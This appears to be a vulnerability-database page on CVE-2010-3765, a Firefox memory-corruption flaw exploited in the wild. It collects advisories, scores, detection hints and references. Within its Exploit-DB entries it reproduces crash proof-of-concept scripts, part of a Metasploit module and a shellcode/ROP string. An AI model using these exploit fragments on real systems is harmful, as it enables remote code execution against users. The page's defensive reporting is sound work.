CVE-2010-3765
published 2010-10-28CVE-2010-3765: Mozilla Firefox 3.5.x through 3.5.14 and 3.6.x through 3.6.11, Thunderbird 3.1.6 before 3.1.6 and 3.0.x before 3.0.10, and SeaMonkey 2.x before 2.0.10, when…
PriorityP188critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2025-10-27
Exploited in the wild
EPSS
83.28%
99.6th percentile
Mozilla Firefox 3.5.x through 3.5.14 and 3.6.x through 3.6.11, Thunderbird 3.1.6 before 3.1.6 and 3.0.x before 3.0.10, and SeaMonkey 2.x before 2.0.10, when JavaScript is enabled, allows remote attackers to execute arbitrary code via vectors related to nsCSSFrameConstructor::ContentAppended, the appendChild method, incorrect index tracking, and the creation of multiple frames, which triggers memory corruption, as exploited in the wild in October 2010 by the Belmoo malware.
Affected
49 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
ub333udeaduffffuffff
bytes↗
uffffuffffuffffuffff (shellcode terminator pattern)
- →Target fingerprinting via navigator.userAgent: exploit checks for Firefox 3.6.8–3.6.11 on non-Vista/Win7 platforms before delivering payload ↗
- →Exploit triggers via interleaved document.write and appendChild calls using specific HTML tags: 'audio', 'a', 'base' — monitor for this pattern in JavaScript executing in browser context ↗
- →Metasploit module uses vuln_test checking for InstallVersion object to confirm vulnerable Firefox target before exploitation ↗
- →In-the-wild exploit (Belmoo malware) drops and executes payload as vchost.exe in %TEMP% directory — monitor for this process creation ↗
- →Metasploit module sets EXITFUNC=process and uses migrate -f as InitialAutoRunScript — look for suspicious process migration post-exploitation ↗
- →Exploit payload space is 1024 bytes with no bad characters; ROP chain signatures (e.g. u9090u0FEB NOP sled marker, u5B58u1889 gadget) appear repeatedly in shellcode blobs ↗
- ·Exploit only targets Firefox 3.6.8–3.6.11 on Windows XP / Windows Server 2003 (not Vista/Win7); the in-the-wild and Metasploit variants both explicitly exclude NT 6.0 and 6.1 ↗
- ·JavaScript must be enabled in the browser for the vulnerability to be exploitable ↗
- ·Affected products span Firefox 3.5.x–3.5.14, 3.6.x–3.6.11, Thunderbird 3.0.x before 3.0.10 and before 3.1.6, and SeaMonkey 2.x before 2.0.10 — detection scope should cover all these products, not just Firefox ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa9.8CRITICAL
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-cmrc-q43h-xrrq: Mozilla Firefox 3
ghsa_unreviewed·2022-05-17
CVE-2010-3765 [HIGH] CWE-119 GHSA-cmrc-q43h-xrrq: Mozilla Firefox 3
Mozilla Firefox 3.5.x through 3.5.14 and 3.6.x through 3.6.11, Thunderbird 3.1.6 before 3.1.6 and 3.0.x before 3.0.10, and SeaMonkey 2.x before 2.0.10, when JavaScript is enabled, allows remote attackers to execute arbitrary code via vectors related to nsCSSFrameConstructor::ContentAppended, the appendChild method, incorrect index tracking, and the creation of multiple frames, which triggers memory corruption, as exploited in the wild in October 2010 by the Belmoo malware.
VulnCheck
Mozilla Multiple Products Remote Code Execution Vulnerability
vulncheck·2010·CVSS 9.8
CVE-2010-3765 [CRITICAL] Mozilla Multiple Products Remote Code Execution Vulnerability
Mozilla Multiple Products Remote Code Execution Vulnerability
Mozilla Firefox, SeaMonkey, and Thunderbird contain an unspecified vulnerability when JavaScript is enabled. This allows remote attackers to execute arbitrary code via vectors related to nsCSSFrameConstructor::ContentAppended, the appendChild method, incorrect index tracking, and the creation of multiple frames, which triggers memory corruption.
Affected: Mozilla Multiple Products
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.cve.org/CVERecord?id=CVE-2010-3765; https://www.mozilla.org/en-US/security/advisories/mfsa2010-73/; https://www.cisa.gov/sites/def
CISA
Mozilla Multiple Products Remote Code Execution Vulnerability
cisa·2025-10-06·CVSS 9.8
CVE-2010-3765 [CRITICAL] Mozilla Multiple Products Remote Code Execution Vulnerability
Vulnerability: Mozilla Multiple Products Remote Code Execution Vulnerability
Affected: Mozilla Multiple Products
Mozilla Firefox, SeaMonkey, and Thunderbird contain an unspecified vulnerability when JavaScript is enabled. This allows remote attackers to execute arbitrary code via vectors related to nsCSSFrameConstructor::ContentAppended, the appendChild method, incorrect index tracking, and the creation of multiple frames, which triggers memory corruption.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://www.mozilla.org/en-US/security/advisories/mfsa2010-73 ; https://nvd.nist.gov/vuln/detail/CVE-2010-3765
Remediation Due Date: 2025-10-27
Ubuntu
Xulrunner vulnerability
vendor_ubuntu·2010-10-29
CVE-2010-3765 Xulrunner vulnerability
Title: Xulrunner vulnerability
Summary: A Xulrunner application could be made to run programs as your login if it
opened a specially crafted file.
USN-1011-1 fixed a vulnerability in Firefox. This update provides the
corresponding update for Xulrunner.
Original advisory details:
Morten Krakvik discovered a heap-based buffer overflow in Firefox. If a
user were tricked into navigating to a malicious site, an attacker could
cause a denial of service or possibly execute arbitrary code as the user
invoking the program.
Instructions: After a standard system update you need to restart any applications that
use Xulrunner to make all the necessary changes.
Ubuntu
Thunderbird vulnerability
vendor_ubuntu·2010-10-28
CVE-2010-3765 Thunderbird vulnerability
Title: Thunderbird vulnerability
Summary: Thunderbird could be made to run programs as your login if it opened a
specially crafted email message or news item.
USN-1011-1 fixed a vulnerability in Firefox. This update provides the
corresponding update for Thunderbird.
Original advisory details:
Morten Krakvik discovered a heap-based buffer overflow in Firefox. If a
user were tricked into navigating to a malicious site, an attacker could
cause a denial of service or possibly execute arbitrary code as the user
invoking the program.
Instructions: After a standard system update you need to restart Thunderbird to make all
the necessary changes.
Ubuntu
Firefox vulnerability
vendor_ubuntu·2010-10-28
CVE-2010-3765 Firefox vulnerability
Title: Firefox vulnerability
Summary: Firefox could be made to run programs as your login if it opened a
specially crafted web page.
Morten Krakvik discovered a heap-based buffer overflow in Firefox. If a
user were tricked into navigating to a malicious site, an attacker could
cause a denial of service or possibly execute arbitrary code as the user
invoking the program.
Instructions: After a standard system update you need to restart Firefox to make all the
necessary changes.
Red Hat
Firefox race condition flaw (MFSA 2010-73)
vendor_redhat·2010-10-28·CVSS 9.8
CVE-2010-3765 [CRITICAL] Firefox race condition flaw (MFSA 2010-73)
Firefox race condition flaw (MFSA 2010-73)
Mozilla Firefox 3.5.x through 3.5.14 and 3.6.x through 3.6.11, Thunderbird 3.1.6 before 3.1.6 and 3.0.x before 3.0.10, and SeaMonkey 2.x before 2.0.10, when JavaScript is enabled, allows remote attackers to execute arbitrary code via vectors related to nsCSSFrameConstructor::ContentAppended, the appendChild method, incorrect index tracking, and the creation of multiple frames, which triggers memory corruption, as exploited in the wild in October 2010 by the Belmoo malware.
No detection rules found.
Exploit-DB
Mozilla Firefox - Interleaving 'document.write' / 'appendChild' (Metasploit)
exploitdb·2011-02-22
CVE-2010-3765 Mozilla Firefox - Interleaving 'document.write' / 'appendChild' (Metasploit)
Mozilla Firefox - Interleaving 'document.write' / 'appendChild' (Metasploit)
---
##
# $Id: mozilla_interleaved_write.rb 11796 2011-02-22 20:49:44Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 HttpClients::FF,
:ua_minver => "3.6.8",
:ua_maxver => "3.6.11",
:os_name => OperatingSystems::WINDOWS,
:javascript => true,
:rank => NormalRanking,
:vuln_test => "if (typeof InstallVersion != 'undefined') { is_vuln = true; }",
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Mozilla Firefox Interleaving document.write and appe
Exploit-DB
Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Remote Overflow
exploitdb·2010-10-29
CVE-2010-3765 Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Remote Overflow
Mozilla Firefox 3.6.8
uccccuccccu0d00u0d0du0d00u102du1000u0d00u102du1000u102du1000u2853u1000u0011u0000u116cu1000u0300u7ffeub459u1002u6b99u1000ub333udeaduffffuffffu57a8u13e8u0000u0000u57a0u13e8u1000u0000u0040u0000u2853u1000u0001u0000u2853u1000u0000u0000u1af1u1000u9090u0febu7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000u5b58u1889u7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000ufb83u74ffu7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000u830bu04c0u7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000uf3ebue890u7be4u1005u2a49u1000u2a49u1000u2a49u1000u2a49u1000u1af1u1000uffecuffffu7be4u1005u1af1u1000u57a8u13e8u116cu1000u57a8u13e8ub459u1002
uef52u100auef52u100auef52u100auef52u100auef52u100auef52u100auef51u100au0011u0000u5500u1001u0300u7FFEud761u1004uff9cu
Exploit-DB
Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Denial of Service
exploitdb·2010-10-28
CVE-2010-3765 Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Denial of Service
Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Denial of Service
---
Source: https://bugzilla.mozilla.org/show_bug.cgi?id=607222
function getatts(str){
var cobj=document.createElement(str);
cobj.id="testcase";
document.body.appendChild(cobj);
var obj=document.getElementById("testcase");
var atts = new Array();
for(p in obj){
if(typeof(obj[p])=="string"){
atts.push(p);
}
}
document.body.removeChild(cobj);
return atts;
}
function crashme() {
var tags = new Array("audio", "a", "base");
for (inx = 0; inx " + tags[i];
document.write(html);
}
}
}
}
Crash Me!
Exploit-DB
Mozilla Firefox - Simplified Memory Corruption (PoC)
exploitdb·2010-10-28·CVSS 9.8
CVE-2010-3765 [CRITICAL] Mozilla Firefox - Simplified Memory Corruption (PoC)
Mozilla Firefox - Simplified Memory Corruption (PoC)
---
Hi there,
For those who still do not know .. The proof of concept (that I have
extracted) for CVE-2010-3765 is the following:
function G(str){
var cobj=document.createElement(str);
document.body.appendChild(cobj);
cobj.scrollWidth;
}
function crashme() {
document.write("fooFOO");
G("a");
document.write("a");
G("base");
document.write("barBAR");
G("audio");
}
crashme();
For more details:
http://extraexploit.blogspot.com/2010/10/cve-2010-3765-proof-of-concept.html
--
http://extraexploit.blogspot.com
Metasploit
Mozilla Firefox Interleaved document.write/appendChild Memory Corruption
metasploit
Mozilla Firefox Interleaved document.write/appendChild Memory Corruption
Mozilla Firefox Interleaved document.write/appendChild Memory Corruption
This module exploits a code execution vulnerability in Mozilla Firefox caused by interleaved calls to document.write and appendChild. This module was written based on a live exploit found in the wild.
Bugzilla
CVE-2010-3765 Firefox race condition flaw (MFSA 2010-73)
bugzilla·2010-10-26·CVSS 9.8
CVE-2010-3765 [CRITICAL] CVE-2010-3765 Firefox race condition flaw (MFSA 2010-73)
CVE-2010-3765 Firefox race condition flaw (MFSA 2010-73)
A race condition exists in Firefox's handling of DOM element (tags)
properties. Malicious HTML content could use this flaw to execute arbitrary
code as the user running Firefox.
This flaw does not affect the versions of SeaMonkey or Thunderbird shipped
in Red Hat Enterprise Linux 3, 4, or 5.
Discussion:
This is now live:
http://www.mozilla.org/security/announce/2010/mfsa2010-73.html
---
This issue has been addressed in following products:
Red Hat Enterprise Linux 5
Via RHSA-2010:0809 https://rhn.redhat.com/errata/RHSA-2010-0809.html
---
This issue has been addressed in following products:
Red Hat Enterprise Linux 4
Via RHSA-2010:0808 https://rhn.redhat.com/errata/RHSA-2010-0808.html
---
This issue has been addressed in
Recorded Future
October 2025 CVE Landscape
blogs_recorded_future·CVSS 9.8
[CRITICAL] October 2025 CVE Landscape
# October 2025 CVE Landscape: 32 High-Impact Vulnerabilities Demand Immediate Attention
October 2025 saw a significant escalation in vulnerability activity, with Recorded Future's Insikt Group® identifying 32 high-impact vulnerabilities, double the 16 identified in September's CVE report. Twenty-six of these vulnerabilities scored as Very Critical.
What security teams need to know:
- Microsoft dominates: Eight of 32 vulnerabilities affect Microsoft products, including a critical WSUS deserialization flaw (CVE-2025-59287) now being actively exploited
- CL0P ransomware group exploited an Oracle E-Business Suite zero-day (CVE-2025-61882) for data theft and extortion campaigns
- Legacy vulnerabilities persist: Five of the 14 RCE-enabling vulnerabilities are over a decade old, highlighting c
http://blog.mozilla.com/security/2010/10/26/critical-vulnerability-in-firefox-3-5-and-firefox-3-6/http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_mozilla_firefoxhttp://isc.sans.edu/diary.html?storyid=9817http://lists.fedoraproject.org/pipermail/package-announce/2010-November/050233.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2010-October/050061.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2010-October/050154.htmlhttp://norman.com/about_norman/press_center/news_archive/2010/129223/en?utm_source=twitterfeed&utm_medium=twitterhttp://secunia.com/advisories/41761http://secunia.com/advisories/41965http://secunia.com/advisories/41966http://secunia.com/advisories/41969http://secunia.com/advisories/41975http://secunia.com/advisories/42003http://secunia.com/advisories/42008http://secunia.com/advisories/42043http://secunia.com/advisories/42867http://slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.556706http://support.avaya.com/css/P8/documents/100114329http://support.avaya.com/css/P8/documents/100114335http://www.debian.org/security/2010/dsa-2124http://www.exploit-db.com/exploits/15341http://www.exploit-db.com/exploits/15342http://www.exploit-db.com/exploits/15352http://www.mandriva.com/security/advisories?name=MDVSA-2010:213http://www.mandriva.com/security/advisories?name=MDVSA-2010:219http://www.mozilla.org/security/announce/2010/mfsa2010-73.htmlhttp://www.norman.com/about_norman/press_center/news_archive/2010/129223/http://www.norman.com/security_center/virus_description_archive/129146/http://www.redhat.com/support/errata/RHSA-2010-0808.htmlhttp://www.redhat.com/support/errata/RHSA-2010-0809.htmlhttp://www.redhat.com/support/errata/RHSA-2010-0810.htmlhttp://www.redhat.com/support/errata/RHSA-2010-0861.htmlhttp://www.redhat.com/support/errata/RHSA-2010-0896.htmlhttp://www.securityfocus.com/bid/44425http://www.securitytracker.com/id?1024645http://www.securitytracker.com/id?1024650http://www.securitytracker.com/id?1024651http://www.ubuntu.com/usn/USN-1011-2http://www.ubuntu.com/usn/USN-1011-3http://www.ubuntu.com/usn/usn-1011-1http://www.vupen.com/english/advisories/2010/2837http://www.vupen.com/english/advisories/2010/2857http://www.vupen.com/english/advisories/2010/2864http://www.vupen.com/english/advisories/2010/2871http://www.vupen.com/english/advisories/2011/0061https://bugzilla.mozilla.org/show_bug.cgi?id=607222https://bugzilla.mozilla.org/show_bug.cgi?id=607222#c53https://bugzilla.redhat.com/show_bug.cgi?id=646997https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12108https://rhn.redhat.com/errata/RHSA-2010-0812.htmlhttp://blog.mozilla.com/security/2010/10/26/critical-vulnerability-in-firefox-3-5-and-firefox-3-6/http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_mozilla_firefoxhttp://isc.sans.edu/diary.html?storyid=9817http://lists.fedoraproject.org/pipermail/package-announce/2010-November/050233.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2010-October/050061.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2010-October/050154.htmlhttp://norman.com/about_norman/press_center/news_archive/2010/129223/en?utm_source=twitterfeed&utm_medium=twitterhttp://secunia.com/advisories/41761http://secunia.com/advisories/41965http://secunia.com/advisories/41966http://secunia.com/advisories/41969http://secunia.com/advisories/41975http://secunia.com/advisories/42003http://secunia.com/advisories/42008http://secunia.com/advisories/42043http://secunia.com/advisories/42867http://slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.556706http://support.avaya.com/css/P8/documents/100114329http://support.avaya.com/css/P8/documents/100114335http://www.debian.org/security/2010/dsa-2124http://www.exploit-db.com/exploits/15341http://www.exploit-db.com/exploits/15342http://www.exploit-db.com/exploits/15352http://www.mandriva.com/security/advisories?name=MDVSA-2010:213http://www.mandriva.com/security/advisories?name=MDVSA-2010:219http://www.mozilla.org/security/announce/2010/mfsa2010-73.htmlhttp://www.norman.com/about_norman/press_center/news_archive/2010/129223/http://www.norman.com/security_center/virus_description_archive/129146/http://www.redhat.com/support/errata/RHSA-2010-0808.htmlhttp://www.redhat.com/support/errata/RHSA-2010-0809.htmlhttp://www.redhat.com/support/errata/RHSA-2010-0810.htmlhttp://www.redhat.com/support/errata/RHSA-2010-0861.htmlhttp://www.redhat.com/support/errata/RHSA-2010-0896.htmlhttp://www.securityfocus.com/bid/44425http://www.securitytracker.com/id?1024645http://www.securitytracker.com/id?1024650http://www.securitytracker.com/id?1024651http://www.ubuntu.com/usn/USN-1011-2http://www.ubuntu.com/usn/USN-1011-3http://www.ubuntu.com/usn/usn-1011-1http://www.vupen.com/english/advisories/2010/2837http://www.vupen.com/english/advisories/2010/2857http://www.vupen.com/english/advisories/2010/2864http://www.vupen.com/english/advisories/2010/2871http://www.vupen.com/english/advisories/2011/0061https://bugzilla.mozilla.org/show_bug.cgi?id=607222https://bugzilla.mozilla.org/show_bug.cgi?id=607222#c53https://bugzilla.redhat.com/show_bug.cgi?id=646997
+ 3 more references
2010-10-28
Published
2025-10-06
Added to CISA KEV
Exploited in the wild